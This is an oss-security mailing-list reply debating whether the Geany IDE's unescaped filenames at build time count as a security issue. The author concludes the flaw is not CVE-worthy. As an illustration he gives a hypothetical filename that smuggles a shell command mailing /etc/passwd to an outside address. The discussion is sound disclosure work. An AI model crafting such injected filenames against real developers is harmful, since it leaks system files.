Date: Thu, 13 Dec 2012 11:52:26 +0100
From: Andreas Ericsson <ae@....se>
To: oss-security@...ts.openwall.com
CC: Eitan Adler <lists@...anadler.com>,
 "Steven M. Christey" <coley@...us.mitre.org>,
 Nick Treleaven <nick.treleaven@...nternet.com>,
 Colomban Wendling <lists.ban@...besfolles.org>,
 Enrico Troeger <enrico.troeger@...na.de>,
 Matthew Brush <mbrush@...ebrainz.ca>,
 Frank Lanitz <frank@...nk.uvena.de>, josef@...icpanda.com,
 jonathan.underwood@...il.com
Subject: Re: Geany IDE not escaping filenames during compilation
 / build - a security issue or not?

On 12/13/2012 06:54 AM, Eitan Adler wrote:
> On 12 December 2012 11:51, Jan Lieskovsky <jlieskov@...hat.com> wrote:
>> The questions:
>> 1) should Geany escape the filenames?,
>
> Up to the maintainers.
>
>> 2) is this a security issue or not?
>
> Unlikely.  Is there a way a malicious document could cause code
> execution without user action?

Extremely unlikely. The way to get someone to trigger this is to send
a source-file to a developer who then opens it in geany without realizing
that the file is named "mail evil@...kdom.com -s teehee < /etc/passwd".
The "attacked" developer then need to attempt to build it from geany's
internal "build now" button.

A simpler misdeed of similar charactaristics would be to ship a bogus
./configure script that people (who are not developers, mind you)
blindly run and which executes bogus commands on behalf of the logged
in user.

Since the latter isn't really CVE-worthy, I doubt the former even
comes close.

--
Andreas Ericsson                   andreas.ericsson@....se

on peace.